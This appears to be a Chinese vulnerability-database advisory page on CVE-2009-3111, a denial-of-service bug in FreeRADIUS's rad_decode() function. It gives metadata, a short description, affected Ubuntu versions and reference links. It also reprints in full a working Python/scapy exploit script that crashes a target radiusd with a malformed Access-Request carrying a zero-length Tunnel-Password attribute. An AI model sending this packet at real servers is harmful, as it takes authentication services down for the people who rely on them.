FreeRADIUS src/lib/radius.c 'rad_decode()'拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1118451 漏洞类型 其他
发布时间 2009-09-11 更新时间 2010-01-11
CVE编号 CVE-2009-3111 CNNVD-ID CNNVD-200909-148
漏洞平台 Multiple CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/9642
https://www.securityfocus.com/bid/36263
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200909-148
|漏洞详情
FreeRadius是一款使用RADIUS协议的开放源代码验证和帐户系统。FreeRadius的src/lib/radius.c文件的rad_decode()函数在解码畸形报文时存在拒绝服务漏洞。远程攻击者可以通过向radiusd守护程序发送带有0长度Tunnel-Password属性的畸形Access-Request报文导致拒绝服务。
|漏洞EXP
#!/usr/bin/env python
# FreeRadius Packet Of Death
# Matthew Gillespie 2009-09-11
# Requires RadiusAttr http://trac.secdev.org/scapy/attachment/ticket/92/radiuslib.py
# http://www.braindeadprojects.com/blog/what/freeradius-packet-of-death/

import sys
from scapy.all import IP,UDP,send,Radius,RadiusAttr

if len(sys.argv) != 2:
	print "Usage: radius_killer.py <radiushost>\n"
	sys.exit(1)

PoD=IP(dst=sys.argv[1])/UDP(sport=60422,dport=1812)/ \
	Radius(code=1,authenticator="\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99",id=180)/ \
	RadiusAttr(type=69,value="",len=2)

send(PoD)

# milw0rm.com [2009-09-11]
|受影响的产品
Ubuntu Ubuntu Linux 8.04 LTS sparc Ubuntu Ubuntu Linux 8.04 LTS powerpc Ubuntu Ubuntu Linux 8.04 LTS lpia Ubuntu Ubuntu Linux 8.04 LTS i386 Ubuntu Ubuntu Linux 8.04 LTS amd64
|参考资料

来源:MLIST
名称:[oss-security]20090909CVERequest--FreeRADIUS1.1.8
链接:http://www.openwall.com/lists/oss-security/2009/09/09/1
来源:github.com
链接:http://github.com/alandekok/freeradius-server/commit/860cad9e02ba344edb0038419e415fe05a9a01f4
来源:VUPEN
名称:ADV-2009-3184
链接:http://www.vupen.com/english/advisories/2009/3184
来源:REDHAT
名称:RHSA-2009:1451
链接:http://www.redhat.com/support/errata/RHSA-2009-1451.html
来源:support.apple.com
链接:http://support.apple.com/kb/HT3937
来源:SUSE
名称:SUSE-SR:2009:018
链接:http://lists.opensuse.org/opensuse-security-announce/2009-11/msg00004.html
来源:SUSE
名称:SUSE-SR:2009:016
链接:http://lists.opensuse.org/opensuse-security-announce/2009-10/msg00001.html
来源:APPLE
名称:APPLE-SA-2009-11-09-1
链接:http://lists.apple.com/archives/security-announce/2009/Nov/msg00000.html